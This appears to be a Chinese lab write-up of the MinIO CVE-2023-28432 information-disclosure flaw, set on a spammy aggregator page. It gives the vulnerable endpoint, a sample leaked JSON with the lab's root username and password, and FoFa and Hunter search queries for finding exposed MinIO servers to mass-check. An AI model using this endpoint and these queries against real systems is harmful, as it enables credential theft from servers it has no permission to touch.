当前位置: 首页 > news >正文

电商设计素材网站推荐wordpress 数字商城

电商设计素材网站推荐,wordpress 数字商城,网站运营 解决方案,网站建设shwzzz前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。 0x00 环境配置 …

前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。

0x00 环境配置

此次实验,我们继续使用P神的Minio的docker环境。启动环境:

cd /vulhub-master/minio/CVE-2023-28432/
docker-compose up -d

启动完成后访问http://your-ip:9001为集群的web管理页面,另外http://your-ip:9000为集群的API接口。

0x01 触发漏洞

这个漏洞的节点存在于这个路径:http://your-ip:9000/minio/bootstrap/v1/verify
对该路径发送POST请求会返回一段JSON数据:

{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}

在该json字段中,我们可以看到MINIO_ROOT_USER字段包含账户名,MINIO_ROOT_PASSWORD字段包含账户的密码。所以该信息泄露其实就是API接口的信息泄露。我们可以根据这个特性,写一个批量的脚本文件来检测,并将其中的关键信息返回。

0x02 POC利用

先在FoFa或者鹰图上面收集跟MinIO集群相关的资产。
banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
脚本相关较为敏感,若有需要可以加群下载。
其实脚本比较简单,就是向这个漏洞URL发送请求,判断返回包是否包含敏感字段。
如果包含就说明有敏感JSON字段,最后对这个JSON数据进行解析,拿出其中我们需要的两个字段即可。下图为利用效果。

0x03 加固建议

升级官方最新补丁可以修复该漏洞。

http://www.yayakq.cn/news/90971/

相关文章:

  • 成都专业做网站公司1688黄页大全
  • 凡客网站建设别人能打开的网站我打不开
  • php网站开发教案php网页设计培训
  • 南联网站建设哪家好网站建设网站维护
  • 有域名后怎么做网站无锡免费网站制作
  • 网站缩写的英文ui设计培训机构哪个比较好
  • 网站建设带后台带微商城韩雪冬个人网站
  • 营销型网站建设哪家好免费网站建设新技术
  • jsp怎么做网站的删除素材网站上的元素是怎么做的
  • 做网站和做商城的区别在哪里做外贸需要做网站吗
  • 网站开发 微信收款免费永久云服务器购买
  • 网站自己怎么做的seo查询网站
  • 一个完整的电商网站开发周期比较好的网页制作公司
  • 怎么做网站优化的免费logo设计网站推荐
  • 主任说到学校新网站的建设工作下载河北人社网app
  • 国土系统网站建设用地受理表图文网站建设
  • 网站seo优化课程1688购物平台
  • 2345浏览器官方网站php网站开发考试
  • 金泉网做网站推广网站认证是什么意思
  • 常州制作网站公司html网站开发流程
  • 东莞做商城网站建设哪家好wordpress 主题 效果 差别大
  • 网站建设上传遵义百度推广公司
  • 苏州吴江区城市建设局网站域名服务器的四种类型
  • 北京公司网站建设报价wordpress去
  • 免费crm在线看系统湖南网站排名优化公司
  • vr功能网站建设用html
  • 手机app设计网站cn域名
  • 任县城乡建设局网站wordpress 去掉版权信息
  • 国家对地理信息网站建设的重视云南云南省城乡建设厅网站
  • 太原网站seo服务网站制作零基础学习